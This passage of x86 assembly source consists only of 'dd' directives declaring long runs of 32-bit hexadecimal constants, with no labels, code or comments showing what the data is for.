dd 93688143h, 0BC021B53h, 0E809DF86h, 0FC99E190h, 0D935DC89h
dd 9A52359Fh, 17E508C4h, 4215DA8Ch, 0E16B56C0h, 4B1DC7AAh
dd 28263139h, 0B92806EEh, 3F579482h, 0E848A1F9h, 4BB871F3h
dd 0C2C8A66Eh, 5E9DDFFBh, 0C699D4F5h, 27BC32C6h, 0FF670802h
dd 2B376A43h, 0C81785CEh, 0E6FFC2BBh, 3B5A2122h, 2A8BCA22h
dd 78E3B518h, 3F31287Eh, 56BF8564h, 0C74284FFh, 5EADE3C5h
dd 14E34EC8h, 0DB76E25Fh, 14807153h, 9CD67E17h, 9424B0D4h
dd 663102FCh, 2483DF9Ch, 0D79FA00Bh, 51C6E888h, 931B2268h
dd 17F6B881h, 0B135E74Eh, 0C5D57D9Bh, 0B7F273C4h, 0C271B895h
dd 532768A2h, 929AAD8Ah, 24BEBA82h, 0CFEFBBB0h, 2AB386BCh
dd 6D8E2828h, 0C6F27A69h, 69847822h, 23B1EB54h, 25F93447h
dd 0CEE2B07Fh, 34FA85F0h, 137C0ED0h, 4DBEA256h, 709E5203h
dd 49EB3F14h, 0E3D2D195h, 0A68027B9h, 9661883h, 0D8D8F1E2h
dd 0A4D04AF5h, 4434996Fh, 0D2471FD7h, 0B3EC26h, 5A190A2Ch
dd 473B8B28h, 9B309DFEh, 0F46DDFC7h, 0AF975650h, 3A8A9610h
dd 0B77960CEh, 27114C2Ah, 13908C18h, 97D0E395h, 6DA789A0h
dd 0E2CC06C8h, 78B5A575h, 0B6A24327h, 9E0A65F2h, 285AEA96h
dd 0BEDC4B31h, 9660AB5h, 5467FF78h, 6F1CD0BBh, 0C1DC7294h
dd 0C042640h, 55711B1Bh, 756A2FAAh, 0F411173Fh, 0AB6C7069h
dd 0B60CFB5h, 0C7CBD23Fh, 0EB6387A3h, 989F5BB5h, 6E0C7548h
dd 1C9323CBh, 0BB0DF09Bh, 93FAB6Fh, 3B4AA6A1h, 0E08B91DAh
dd 0D9279542h, 0A085A9D8h, 6B2A01B0h, 8BA99F4Bh, 206F7AE0h
dd 5F028B0h, 0B199FAD1h, 0BFF8C35h, 0B7015313h, 1DC3457h
dd 0D591E8B9h, 45B856D1h, 222619ECh, 0FF7DCEECh, 7756800Dh
dd 5F1BF849h
dd 4E123BB8h, 0BC662CC5h, 0AC764F88h, 0E3C35EC2h, 0BDC9E20h
dd 0A412F31Bh, 0E83F6EEDh, 3F32ED61h, 0E3A0DB7Ah, 0DFC64AF2h
dd 0F32A2288h, 0BE70E5E0h, 4B4281F4h, 65874035h, 8E7AC3D3h
dd 0E2D7CA8Fh, 0CD3589C8h, 5F5E9202h, 3BC9604h, 0BBF6D481h
dd 6A3534B5h, 786CD7C9h, 2A9FA527h, 0D436066Dh, 0A55557E7h
dd 0B0E850Bh, 510D72FFh, 4E4B0F65h, 269E098Eh, 1D60012Ah
dd 8AB7F764h, 16F0A8Bh, 9B9F816Fh, 0BEFE6F9h, 67EDA629h
dd 41657930h, 4E5E2F3Fh, 8E475A0Ch, 0F0018D3Ah, 3CF590FFh
dd 0E9FB90F7h, 89F088C9h, 3C673D57h, 93924992h, 7874A69Bh
dd 35C41EB0h, 0F39516B0h, 0A582533Fh, 7C416200h, 0DD3DF7CFh
dd 0D5ED38AAh, 0F2C9B4B3h, 433278F8h, 0A3C7AD2Ch, 0AEB3FC88h
dd 4EAF1E0Ah, 784D6A2Dh, 0B0391AFBh, 530DA787h, 0D729B350h
dd 60C2F049h, 3902D0E9h, 5709B0A5h, 0CD6C5EEFh, 35F12D48h
dd 0BA2F110h, 0D4C378AAh, 40081463h, 3662B95Ch, 6F8F919Dh
dd 0C109E412h, 959C238Dh, 72158C78h, 7B9467ECh, 50AA8767h
dd 495B478Ah, 1A879AE8h, 3352F81Eh, 0F2356432h, 7A852BAh
dd 90F8B4FAh, 2909696Bh, 0C1C9836Ch, 0B5C62AACh, 385B38A4h
dd 0AF1D6109h, 7938A5F5h, 706518B0h, 0D720451Bh, 5A4A77ADh
dd 0C534EF55h, 0D45CC42Ch, 0CD96E3EEh, 58FE0C86h, 98110402h
dd 99B4A3C4h, 0A305383Ah, 9E54E6F8h, 0F3F7FAD6h, 0F8AC7021h
dd 9C2F15EEh, 77A99A7Bh, 0F86BDA9Dh, 5FB63A6Dh, 64462ECBh
dd 219BD666h, 6D9CB00Dh, 0B4F0FFFBh, 0BFF73CFDh, 2145A2B4h
dd 0EC3E79D9h, 259C8007h, 6C9F0916h, 8EFD8589h, 0EC242048h
dd 0AF1CE7C7h, 0BFD47574h, 58C76E03h, 6E9D8CF7h, 0D7425D27h
dd 0B89ACD95h, 4619B228h, 0B69D623Dh, 8D76DE4Fh, 0F11EA78Dh
dd 91AEDD00h, 0FF9D5A72h, 64CC889Ch, 1B1AFEFAh, 0B239B41Eh
dd 28B33416h, 47AA9A7h, 0F6473825h, 64AF5413h, 0A7D14265h
dd 0A242639h, 0CF3E5B5Fh, 34581486h, 0C7DA95DBh, 5DEBF35Fh
dd 0D01B8441h, 3A1932Fh, 4208CD47h, 8C73FBB9h, 0BC2BC841h
dd 0C8DC8D63h, 0A7C330BAh, 0E7BBAF8h, 4BE3730Bh, 1D756762h
dd 80D38C5Fh, 0B2B1DA28h, 31A1DBA5h, 0FE03076h, 6DB9F440h
dd 9206B25Eh, 1D8BB3B6h, 8AB93F12h, 5977778h, 11C6ACE3h
dd 0A4CE3FD2h, 11C36427h, 0FECD4E3Fh, 2F01AA34h, 0F5EAAAAEh
dd 81167ED4h, 1330844Fh, 6B25F7Fh, 432BF823h, 39FEB138h
dd 5661FFBEh, 0F0FEC298h, 8DD3AFFCh, 0B2D045B6h, 0D11A82DFh
dd 652AF96Bh, 6A88AEC1h, 1610E2FAh, 6C9A8FC8h, 8E7CF554h
dd 450FB3A4h, 0CC30D23Dh, 0EC556A06h, 3295217Dh, 6F00DCC1h
dd 0D21E791Ch, 0F5966BA0h, 0B2D743C9h, 0C91407B0h, 0DAC054E0h
dd 2E7E7C34h, 5A448C27h, 943BF076h, 759B936Bh, 467B9272h
dd 304C19AAh, 0D041AAh, 0CFA4B1B3h, 0E4DF8B84h, 0F51BC2F4h
dd 35F0392Ch, 4FC1323Dh, 0FD19B6D0h, 0CEF12C22h, 0B111AB20h
dd 1C923645h, 0B93DD308h, 0C2D5D910h, 0E69B2F7h, 78103257h
dd 5301790Ah, 4AC4C8FAh, 746956E3h, 0EBD7853Ah, 1FE6CF17h
dd 2CAB7906h, 9DFA00B5h, 0DEA692A9h, 7F2BF57Bh, 7477F023h
dd 0E638F28Ah, 595625CDh, 0D0136B16h, 1A50D65Fh, 7CE9E8D2h
dd 0B0306A04h, 840FCD95h, 0C6D65366h, 0AB3E3EA6h, 3C23D88Bh
dd 0D080D308h, 0F3CCF380h, 0B1CEE582h, 3B053774h, 0D223C17Fh
dd 8C7820Eh, 0D53F1A4Fh, 3800AFCEh, 9DC62486h, 0C8733E27h
dd 0A8620CA8h, 0AA2BE384h, 128BC349h, 2BD8C964h, 4D7053D3h
dd 7CC63457h, 0A22C37E2h, 8D5465CEh, 0C45E86B1h, 0E605F960h
dd 9E6FA858h, 7CA55D38h, 6F98B64Ch, 3EBD5E11h, 0A8DBDAF1h
dd 11BBF0AFh, 0D0E17FFEh, 0D3BB9EC8h, 243A51E0h, 0B3E19165h
dd 5008B37Fh, 0BF6C6691h, 70A3189Ah, 2D9C50BAh, 0E5F56989h
dd 0D196798Dh, 997E9A44h, 8071B65h, 5D840154h, 635D269Ch
dd 2811A123h, 204DC62Dh, 16DD2A83h, 0F8315E50h, 455AA8A0h
dd 0C3C54307h, 1C2CAB7Eh, 7026CFDFh, 0DFEB9E32h, 0D34AA5BBh
dd 1D7BF8F5h, 4F412B96h, 0A041C193h, 79367961h, 0B6FC05B1h
dd 0D7F98C2Ah, 22C7A6ECh, 400EB57Bh, 495A22DBh, 4D799335h
dd 89E98FC7h, 9E90023Ah, 8B64F3A1h, 76A41D1Ch, 11B16E8h
dd 40AEE4D2h, 0C657924Eh, 0BC63CBB4h, 323FDF7Bh, 30ADF242h
dd 0EAAE11DFh, 0E523AC08h, 3CA3CCCCh, 881CB36Ch, 3356E9E6h
dd 37299C12h, 22C2A7EFh, 0ADE7A19Fh, 9E98F59Ah, 0BA0F137Fh
dd 270B1279h, 0F2AFE5CEh, 586C0C5Eh, 83736560h, 894F43BDh
dd 52022FCFh, 5599BA86h, 38D865D4h, 0A8D01E67h, 0BD5D7A81h
dd 802AAD41h, 3DF2BDCFh, 778CFB73h, 0D27DF75Ch, 20F2401Ah
dd 4568FFA9h, 0B750DA68h, 8BDA5EA7h, 0A5B651E1h, 73439568h
dd 0A6F9271Fh, 88A2C2A6h, 0E5283893h, 0E97950CAh, 78F08DD4h
dd 8B4F1EA9h, 380CC3E6h, 0EE02EE84h, 0EC5A0605h, 630C33DBh
dd 0B5B9D8FDh, 0C59B3D81h, 40E44972h, 6895A1F9h, 24CC1C73h
dd 65D8DCE3h, 5EA5F906h, 0D57B357Ah, 76659DB6h, 0EB0D1625h
dd 0DF67A75Ah, 806FA486h, 0BD126CFEh, 6DC1F96Fh, 26A4D0D9h
dd 2281B1Ch, 47CC1FFFh, 89BD3CECh, 89C50E7Ah, 0AB0B7089h
dd 0FA89620Fh, 5D47F22Dh, 0A74966C0h, 6C9B9F94h, 0EA7FC220h
dd 0B84B93B1h, 0C67F17E1h, 0E1026576h, 0B6A72670h, 0D53D40FCh
dd 93CA7825h, 0CBC2E4Dh, 36A2C5Eh, 0FE6D824Dh, 0D102D58Ah
dd 0B6C76DA4h, 0F934D2CAh, 7D88583Eh, 7241E3ABh, 0DC16884Dh
dd 0D1ECD1D8h, 68457E36h, 0C406334Dh, 43BF5AA8h, 469D3ACBh
dd 33C329E7h, 0F245E85Dh, 0B9A45F7Dh, 70AECBE5h, 0F3A334E4h
dd 172C7E3Fh, 0FE6F701h, 0E556888Bh, 29EEA65h, 0ABBB3A02h
dd 16EBC247h, 0F2A97D70h, 0A7C367Fh, 64315640h, 4265BD3Eh
dd 0F9BD8BCh, 0B08CAC5h, 5BA3EC89h, 7CC30B0Ah, 0D3A3F9E9h
dd 0F99582E8h, 17A7C9F5h, 1425EF35h, 57807929h, 0C081004Eh
dd 84183E65h, 9AA70C5Ah, 27285D4Ch, 3FE75EF5h, 0B9CF6F30h
dd 0B21C1FBEh, 981F464Eh, 32AB1DE1h, 0F86DF2D1h, 0D20DF22Ah
dd 0CC0CA24Eh, 3F086B30h, 0EABD7EA9h, 1B8C5D5Dh, 0E2CCA36Ch
dd 58106D39h, 0F6C8FCDh, 5C92D407h, 1D3F1A43h, 0D7788A15h
dd 0ACA0ADF4h, 0FD0E7106h, 0B145A3D6h, 48053C94h, 899B366h
dd 0E138DF85h, 0B2855F6Bh, 0D2999B0Bh, 9A45ADEFh, 7FA977EEh
dd 0EE926D02h, 0EDA00123h, 6E7DA7C5h, 96DA2620h, 0D9340080h
dd 2BEAA673h, 0AEA2CB01h, 4AB572ACh, 46CAD73Fh, 0E34FBEC2h
dd 6F211580h, 0D69D307Bh, 3BAC8923h, 4CA8DFC0h, 78313560h
dd 806420D4h, 0C3C70A4Eh, 0E22504CEh, 6C2ECDBFh, 0F0DB2A94h
dd 0E0B36C05h, 4C68E1BEh, 0B6C72BAAh, 0B9F836B7h, 3402AEBCh
dd 0AE999A01h, 712D1A5Dh, 9DD93A19h, 2A618BF3h, 0AF0EA559h
dd 45556D6Bh, 4EEFCB79h, 8EA35DFDh, 0D99F68F9h, 0B96E7E45h
dd 4EE47E62h, 0E8D42605h, 8EF0EA5Dh, 0BEF96EE5h, 9AE6A345h
dd 0D11B239Dh, 0B52EF126h, 0D7310235h, 31FBCD12h, 0C0DD578Eh
dd 0D87F7ED1h, 65A45A53h, 0C0E4C781h, 0B9FD5E14h, 42DBCD50h
dd 3DC1A7CDh, 9ADCE33Ch, 1125868h, 0F4C04668h, 0ED6EC27Fh
dd 4739903Bh, 0EC7B5680h, 8A8313Eh, 26C679EBh, 123C163Fh
dd 44AAE836h, 91D0B2Ah, 0F42AD93Bh, 0D754D2B4h, 11B6AB09h
dd 8206FF9h, 0A8BE15E2h, 0B3CD16ABh, 0AE1A0360h, 8644ECB8h
dd 0FA60021Fh, 0BD3F8F06h
dd 62D7D73Eh, 0CC5EF241h, 0AD9E760Eh, 0C7F29460h, 17F53700h
dd 2473D4A8h, 0E7F0E1D3h, 29163D09h, 353445F8h, 4FFDF250h
dd 0F2770624h, 6E80A686h, 7577A160h, 0F28F9395h, 0E1A26D60h
dd 0F1F90618h, 0D6DA71B8h, 95C0816Fh, 0EC9DEF2Ah, 7F51BC45h
dd 0B0B5A735h, 7B748FE6h, 0D9AFBE0Ah, 0E9F010B7h, 0A53CEFCCh
dd 3E486E64h, 67726BFAh, 8435691Ch, 0CFB734BCh, 0D5A10B4Dh
dd 3131CA8Ah, 931AC404h, 6EC83587h, 9CEB6071h, 37F9B0EDh
dd 4FD1232Dh, 0D24D10FAh, 700913FDh, 0F24641FFh, 0C871BC16h
dd 8B2855AAh, 48B95545h, 0B65EB432h, 0D1A4C6A4h, 54D067CEh
dd 5291964Dh, 0F33139ECh, 7C5217DEh, 0DB7706A4h, 16595873h
dd 40CD70BDh, 8CA1B4CBh, 0FEEEBFF3h, 252ED4DDh, 696B16h
dd 95A1234Eh, 9055EB83h, 833ED70Eh, 617086B5h, 97AC9F55h
dd 13D86C0Ah, 0B53D1501h, 0D05C93A6h, 4DBAF2D1h, 21D63BEFh
dd 0DE32681Ch, 0CA539681h, 0A342DB55h, 29D3DB36h, 502E0A17h
dd 12426F6Dh, 19B3CE6Eh, 0BEDA99EEh, 735E28C6h, 466570C9h
dd 9F092DAEh, 0D5F76496h, 0C04DC9DAh, 8298C8A0h, 91A84183h
dd 63D9E71Ah, 81D33F2Ah, 88458DA4h, 0ECE9C78Dh, 5A324909h
dd 1037123Ah, 0ED54247h, 0C4B2B6EEh, 0C56DBA6h, 0D215BEFDh
dd 421A508Ah, 63663042h, 1ACA8DF1h, 0DE620166h, 7F5D6563h
dd 92FB44DEh, 0AD6F221Bh, 6154F638h, 0EEF64C23h, 0A0A7E0AFh
dd 9E913164h, 3F3B02FDh, 2125C682h, 0B215EF80h, 96EAB259h
dd 47D9DDDAh, 36BF7AA1h, 58C4C7A1h, 0AE80FA12h, 3A3E7E96h
dd 8D387C3Ah, 5EA90538h, 31010334h, 176612CCh, 0B4CD63E0h
dd 69A8E0E0h, 50AB8761h, 0E68143B8h, 9CFE5171h, 0C71C8724h
dd 915B89BAh, 0A024E73Bh, 0F8120146h, 3D4FF88Bh, 3ED1442Bh
dd 14EFABBCh, 2AA70F9Dh, 32A40763h, 0A37A4D8Dh, 15E62F89h
dd 523D4D62h, 0BBEA60C5h, 5746E43Fh, 2B24336Bh, 572BF8CAh
dd 2CF0CCEh, 0EA3CB097h, 60BA7036h, 3B2E2DD3h, 31731D15h
dd 8F6478D8h, 0C88B53B6h, 9A696BEDh, 6BDB1C23h, 325A8D3h
dd 0C91992AFh, 9F625C89h, 0B02C5F3Ch, 0DB3F6625h, 2399902Eh
dd 0C326AD58h, 0DEEA7Eh, 0CF5F8826h, 119D347h, 0EB64BF50h
dd 59D293F2h, 4C82E377h, 929DCC59h, 20C1369Fh, 7EA9B88Fh
dd 14B7992Eh, 0F34EF90Eh, 381C566Ah, 77879F56h, 1B4FA612h
dd 6EE49202h, 181375FEh, 95F0E990h, 10E02DCCh, 1B655F8Fh
dd 0A0E9FB99h, 71B7ECE6h, 0C59AC723h, 0AF9BE725h, 772172A8h
dd 588F151Ch, 0DB323C70h, 0D507A102h, 78DA424Eh, 0F40D54C8h
dd 466D6B23h, 22D9394Dh, 16AF724Ah, 0CFC085FCh, 7CCC2D6h
dd 51236285h, 0C7268E43h, 9FECCD79h, 0D35C98EAh, 228EE74Eh
dd 568505CBh, 0E1F4CF16h, 1BB07767h, 678825BDh, 6A1E0DA2h
dd 26A01B43h, 6E71A2B8h, 0B22531Dh, 0ED0ADBEBh, 7907A6BDh
dd 0AE0532C0h, 323640ACh, 0AFCDE8AAh, 0BF23AF50h, 5F75C2C7h
dd 3BC80559h, 0CF727D8Bh, 1F573B49h, 34F73E43h, 511F706Dh
dd 57BFAFB6h, 0CD58C3B4h, 5BBB5C7h, 606C2074h, 0CAC32D3h
dd 51F0EADDh, 0C85F12F0h, 48215ABBh, 0A509A972h, 0E278FEA5h
dd 0FBD4030Ch, 0E280DE91h, 8CDE52B9h, 63B5B2Ch, 0FFBDC3EBh
dd 8B201BEEh, 69CAE2BBh, 22BFC929h, 765FC334h, 0BAC51AC1h
dd 0FD78FAC2h, 20C6652Bh, 0FE2EE2D9h, 0C319E5EFh, 2172F565h
dd 0D43A307Bh, 9C1B5D36h, 0DDF4D5DEh, 41AAFFACh, 0A3931ECBh
dd 512C3C4h, 0BA0FA716h, 22A0D4D9h, 0A678D903h, 0B3EC9C9Fh
dd 0B92459B3h, 0E0EED2A4h, 17BFEC5Ah, 0F620A8B4h, 0B65D3E16h
dd 5C450EA0h, 0CE6C765Ah, 0EBF2E1E2h, 3809EAD9h, 0CFE91FAEh
dd 4C97B1D0h, 92AE331Ah, 75010E66h, 0C7091B5Eh, 316F019Fh
dd 17024764h, 0C64D61BCh, 0C9278478h, 0D9CF8A43h, 125547FAh
dd 8B084FDDh, 0A0EDE89Eh, 57BFB5E1h, 8BD12A86h, 77FB262h
dd 3497DA9Ah, 0E1041A47h, 86DBB9DFh, 66072022h, 5F2020C9h
dd 1BB45494h, 51C8C86Ah, 0DAE81F74h, 0B7A6585Fh, 9565773Ah
dd 926830F2h, 74768FE0h, 235EBBA0h, 1B78B1FBh, 20810222h
dd 7EE460CDh, 0BAB99C18h, 0D276E9A1h, 80C945EBh, 8AAFBF42h
dd 297809DAh, 0E79CBD96h, 8B3B400Fh, 99408FB4h, 208A5CCBh
dd 35B1A15Ah, 34F7D0A4h, 687751E9h, 0F5065FB6h, 0C3EFDA22h
dd 40B849CAh, 6B7831B2h, 0F4DDE7A8h, 0AA260B55h, 22480CB9h
dd 119F17CEh, 9091B156h, 0E94122A6h, 0B8BFDBB8h, 0D8EC0202h
dd 0C294BC56h, 68EAF1DAh, 0ED2DEEDDh, 0EE06DC53h, 0AEB8C60Ah
dd 0C0EE0B4Bh, 0F542C908h, 4CE33663h, 36B990A6h, 8124A04Dh
dd 0F7A3CDDEh, 82C86CC6h, 62233AC0h, 82802B44h, 0E8607B7Ch
dd 1FB9FFC6h, 57E6050Ah, 0DA59E90Eh, 0D838A72Eh, 7BEF3D80h
dd 80923DD6h, 70123B1Fh, 0CC90909Ah, 70E8C881h, 282AC702h
dd 0FF26E941h, 179DDCA8h, 0AA717783h, 0AC93DFA4h, 178FED68h
dd 9B548814h, 3D73449Bh, 0D09558B6h, 1B56DF88h, 0A2C0F0C5h
dd 0F2597515h, 580D7DBCh, 76D781E6h, 31733069h, 95B1DD4Ah
dd 5EF4946Dh, 0B8E184B1h, 82DB8D79h, 971B3CC8h, 4AD30031h
dd 0AEF9E288h, 0F82C6D0h, 0A22F7EADh, 1BCBEBC3h, 8451A0A1h
dd 7F106987h, 0E64CD4ACh, 0F52577A3h, 0C5FB776h, 0FFCE638Bh
dd 0ED289F2Dh, 93AE759Fh, 2A3CB73Bh, 43C34446h, 0B946C974h
dd 8CC04C06h, 835D6A9Dh, 7C93A8D9h, 9ACF0FC8h, 0C916F1D7h
dd 97EC6759h, 0A20D1DA3h, 0DC2A8AB5h, 2E6564A0h, 0B1FC8A1Fh
dd 829F0FD0h, 2F65A7AEh, 0E85C8A21h, 0AEF9716Ah, 625DD594h
dd 0F9E84FD9h, 0C1CAEDC2h, 0D1772DEDh, 5AA53DB2h, 99A74E1Fh
dd 0B54C0168h, 1BBA82D1h, 0B33FA69Dh, 807CF185h, 2C843530h
dd 0EEC4448Dh, 9BECF007h, 170FAC01h, 0E4B0B99Bh, 207392CEh
dd 42BD7F07h, 49EE2111h, 62033DB6h, 0DD73DD0Ah, 0D7950249h
dd 224D540Eh, 6B0BA800h, 84922631h, 3D16BCD7h, 0E4FB7A10h
dd 0C07B112Fh, 3A3F5692h, 2327D2D5h, 0F136B022h, 98F273A0h
dd 0C5F8EC2Dh, 0D33EA5EDh, 0B6E92EFDh, 6EEAD0A1h, 8B9FE44Ch
dd 86970DC5h, 0F7BFB95Dh, 55DD2AF0h, 0E829D4E7h, 7D145D52h
dd 0A09D2A9Dh, 7A108334h, 0E15A92FBh, 407E187Bh, 3563639Eh
dd 0AFA71DB5h, 0FFC2740Dh, 41FA6364h, 0F9FACE0Ch, 9D32FF5Dh
dd 0E6F0A74Eh, 0FE0EDDDAh, 0A3881163h, 0B71408FDh, 3E1E53C0h
dd 0EC2AAF1Ch, 4E08EB17h, 5C68A49Eh, 102F75B8h, 0D83757F2h
dd 694363C4h, 24CC55A5h, 2D5F72CDh, 42D6997h, 578C85A2h
dd 0F15B3C27h, 0BABC6C9Eh, 4599800Fh, 0A9FF14B0h, 6634E18Dh
dd 6B4A85CFh, 63EBD11Bh, 4CDA8063h, 0C72F93BDh, 5A17BD07h
dd 6CA1A652h, 6987B152h, 95E07442h, 0D8B4E5F7h, 138FED9Bh
dd 0D840DD44h, 7D9A791Fh, 14DE711Ah, 2179932h, 35D9EA21h
dd 0D4E1BF35h, 62B2B803h, 6288BE67h, 0DE70ED8Ah, 0CEE6FF9Dh
dd 143D1368h, 0D6300EEAh, 94497917h, 0BAF1BDC8h, 296F5ADBh
dd 49C766FBh, 51D623h, 413D43D4h, 0ED3D5B17h, 0D9F0B2BBh
dd 0B7269FE3h, 0D0A200E5h, 0EF5B993Eh, 9F4FABh, 1D94358Ch
dd 527946B2h, 1D83C236h, 0DB23DB35h, 0D831C6ACh, 8936A951h
dd 0ACD8672Bh, 0BCC569D2h, 4708438Dh, 0D41BDB0Ah, 44941A6Ch
dd 0E08288ECh, 55CDA847h, 45120C51h, 99F91F3Bh, 0CD7ADB5Dh
dd 0F84DCFD6h, 7B1CEBDFh, 0EC76691Fh, 6B87CA93h, 2D2F7F9Ch
dd 0F5753BA8h, 5F4858D6h
dd 0FEFE2670h, 6E9A55EEh, 0E7FCE39Fh, 8792931h, 73111680h
dd 20DE607Ch, 0DB0978E5h, 957E70D5h, 7E2B9A4Fh, 0F243CA05h
dd 1B269A6h, 81414859h, 0A92AB19Fh, 615C0F93h, 0DB1CF0EBh
dd 23025557h, 9FB05CB3h, 0C8EE258Dh, 0FB054351h, 28387927h
dd 0E572C488h, 0FBC50191h, 0A090DB37h, 0B0AF498Dh, 0F793B2C2h
dd 8D3B8AF8h, 1985C328h, 478D4797h, 1B1A485Ah, 0E292AB4Ah
dd 487D154Eh, 56B87A34h, 0CABA6EDh, 0DC1CE267h, 0A56E62C0h
dd 0D43B8CD3h, 0F531A2ACh, 3CB42E4h, 950EBDA0h, 6B07C7DEh
dd 0E500FAABh, 69EFF829h, 8771C89Dh, 0C2FBEE91h, 0BAE9C896h
dd 7339770Fh, 3EA70E63h, 7C16D4DFh, 0C0031835h, 1E4DAC61h
dd 2FEEF9DDh, 904F33F0h, 0E699AE6Eh, 0E11FC09Ch, 0EF14367h
dd 107BB2Fh, 7DF33C12h, 85F808F9h, 0D5A3FBEAh, 30A948AAh
dd 0B3E10C1Fh, 0E489BF4Ah, 0EC6D4E3Ch, 55EFEFF4h, 0E8035102h
dd 10AF442Fh, 66DA49F4h, 0CC167466h, 0CE94BB14h, 21F79586h
dd 72429C89h, 6A8171CAh, 0C4591E10h, 829CB9E6h, 3B9CF605h
dd 0F6E9D626h, 399A936Ah, 80113D4Ah, 0D8C7D0ECh, 0EA5015B8h
dd 995ED6E0h, 991D732h, 0FDC8B828h, 26940421h, 1B63E3B1h
dd 39F24EF8h, 65322E77h, 0DF27EBF9h, 3FF3CA34h, 5261C28Bh
dd 79E7B29Bh, 11A3A346h, 9409A97Dh, 30EAD216h, 557CF39Dh
dd 9B6BB80h, 670F68B1h, 0EFA29085h, 767614BDh, 45751E74h
dd 0A92EB311h, 0DD24DDF5h, 0AF05EA7Bh, 0AEE77C15h, 90C82E9Bh
dd 55541EBh, 12A256DDh, 0E9440411h, 2179E27Ah, 398AE7A8h
dd 65CF8046h, 370D9339h, 0DB8233D1h, 0BFBE36A0h, 14F49578h
dd 0B5AA4C5Bh, 853F9577h, 7F4841Bh, 75D5DB20h, 7690F303h
dd 8D111502h, 3069EB8Bh, 1A6B6C4Fh, 49AAFD49h, 47E9AC39h
dd 2315B1C5h, 970861C0h, 2493B30Dh, 0B2D8A4D9h, 87EF682Ah
dd 7D3719A7h, 3F82D448h, 5664E566h, 12056819h, 437505Fh
dd 0E9028C83h, 0E62C6E65h, 0F963C387h, 539B507Dh, 2F28D734h
dd 3FA5E36Ah, 0C1A34234h, 529698B8h, 18359893h, 0C745E74Eh
dd 0E3595538h, 0D9D504BAh, 5641D1B1h, 1BFEC170h, 830B0C15h
dd 66A9CEB6h, 1A797A7Eh, 0D3DBF3EBh, 3C225E99h, 2C52FA29h
dd 38057AE7h, 91250CF0h, 0F3D4ABB2h, 14BCA55Ch, 0D8BE6B38h
dd 70EA70EAh, 56E2853Ch, 9C20468Eh, 41AEE3CCh, 8D79F397h
dd 0D79C18CCh, 0AF875B33h, 0B2107422h, 0ADE1341Dh, 53B91E7Ah
dd 8C35A3C2h, 86548F51h, 0DFA8FF69h, 0E2FCB1D5h, 0FC516F23h
dd 1016B76Fh, 0E1EB2DDBh, 7418965Ah, 6D74DE8Eh, 927F72F0h
dd 37831FD2h, 32CC1051h, 3BB469D8h, 1BDBAD87h, 190391C2h
dd 0D957195Dh, 47DF6AEh, 7AD2AAAAh, 90BF46C8h, 7A40D18Ch
dd 267B455Ch, 229F685Bh, 0B1A50CE2h, 6850FD96h, 6D62CF50h
dd 0A3978C2Dh, 58454B7Ch, 6CABFE8Fh, 7CEAE61Bh, 0C8E690D8h
dd 0D576223Eh, 2D8F503Dh, 0D2CB828Bh, 40F379C1h, 0D8806443h
dd 6D78AB12h, 0F43236D3h, 8BF50354h, 88D53621h, 7D7D4453h
dd 0E3FB1265h, 529FB138h, 5D13EEEFh, 0B29C3A88h, 8A56E229h
dd 0D3E3EA0Eh, 5A6D3FB2h, 0BA25D6Fh, 66E14770h, 3DA7F3E6h
dd 0FE251261h, 0DE690734h, 5F96B5BDh, 0C53B4052h, 6AB0FABCh
dd 352EB25Ch, 0C2D3A212h, 0E8DD89D0h, 715F3315h, 36C06B5Bh
dd 3ADEC72Ch, 849D2C6Dh, 79F59656h, 6176CD52h, 6ABD4652h
dd 0CA23B085h, 8A3731C0h, 0EC75E964h, 0C96F7B8Fh, 0D0FA5045h
dd 31FBACE3h, 0DC1FB928h, 86FEFD08h, 85D72F41h, 46AEBB75h
dd 575B018h, 9882A657h, 241E8E42h, 0E9AB63F9h, 0BF447804h
dd 2499596Ah, 0DC5CD6CFh, 803581D0h, 5F726D77h, 141A9404h
dd 8C63E16Bh, 0C10009DCh, 94BDF517h, 8B1E1D2Eh, 40C87F0Eh
dd 6AD5BB6Fh, 54E2F1C0h, 25A53C59h, 3B18ABFAh, 0CF4C7FB2h
dd 0AAEEF457h, 0C1189E5Bh, 26C9FFE6h, 4F2AF4A0h, 48D6B9B7h
dd 414AC51h, 0C23DAFFBh, 0A8795A48h, 4B40D716h, 847F7511h
dd 8726BAF2h, 7423810h, 4CE698F4h, 0A338C75Fh, 0B9E052AAh
dd 4F7385DEh, 0B50A022Ah, 32BB92FEh, 9C835764h, 4557B5EAh
dd 0A5D83A3Eh, 1FFE82FCh, 3C0B568h, 0B59AAA07h, 7E4A9FA2h
dd 5F75B1E9h, 4F0D88ECh, 799866Eh, 9B47D728h, 6B1FAA15h
dd 7E58EBA3h, 7A8F4A06h, 2030D45Bh, 0FB7BC145h, 0B796C95h
dd 8F9152E0h, 196B822Ch, 0FC8AECCDh, 9FB17CB7h, 0EC1354B6h
dd 3A7BDCC8h, 313F0FCEh, 34A07F1Eh, 0A1DE8CF8h, 0A21B4C81h
dd 5E6D8687h, 49D7F57Ah, 151BACF1h, 0D3FBBFB0h, 0DAE33422h
dd 4E536F2Ah, 2E0C4951h, 0B70F5507h, 8D5D30B7h, 943BF87h
dd 568DBF3Eh, 96219D8Ch, 0C03D53BAh, 0B6E945A2h, 0A0CD9C09h
dd 2423982Eh, 7C76EE9Fh, 73E4952Ch, 0D8C7B2DFh, 430D9252h
dd 84F0C4FEh, 6308A693h, 4FF26055h, 8E50157Ah, 5ED7BC51h
dd 4EADEAEAh, 8B0CF90Ah, 0C20E1D6Dh, 0D393D394h, 129C920Bh
dd 1F70FA46h, 421E2F7Bh, 77F1676h, 48E78086h, 0E1D96C9Ah
dd 0AA231F91h, 35DA6A9h, 4EECC4C6h, 0F79169A0h, 92732041h
dd 0F91CDDF0h, 0E9D81860h, 3D167BC1h, 32184490h, 0B561DA7Ah
dd 7014BDB4h, 1E877416h, 1B5E5324h, 26B61B13h, 7D48D1B6h
dd 0DF6389E9h, 40A4B756h, 400901FAh, 4DE07E64h, 3B3943Fh
dd 0D9962988h, 0EFD5856Eh, 7F570F03h, 13B0823Bh, 7DBB30D7h
dd 0E3A428E3h, 27FBD962h, 0F909CC04h, 0CB991AEAh, 54DE4539h
dd 5BD1D43Ch, 0E20C4DCEh, 89F8E894h, 0FDFD7377h, 2FC6203Ah
dd 0C6C05911h, 0BED8224Eh, 1D1493C9h, 351D0E5Dh, 85197813h
dd 0D2103F7Ah, 0BE572712h, 546644A6h, 0D08C282Ah, 0F8EFC9BEh
dd 7B8E7026h, 0D25BA4ECh, 55011FE9h, 10538838h, 1C250CC9h
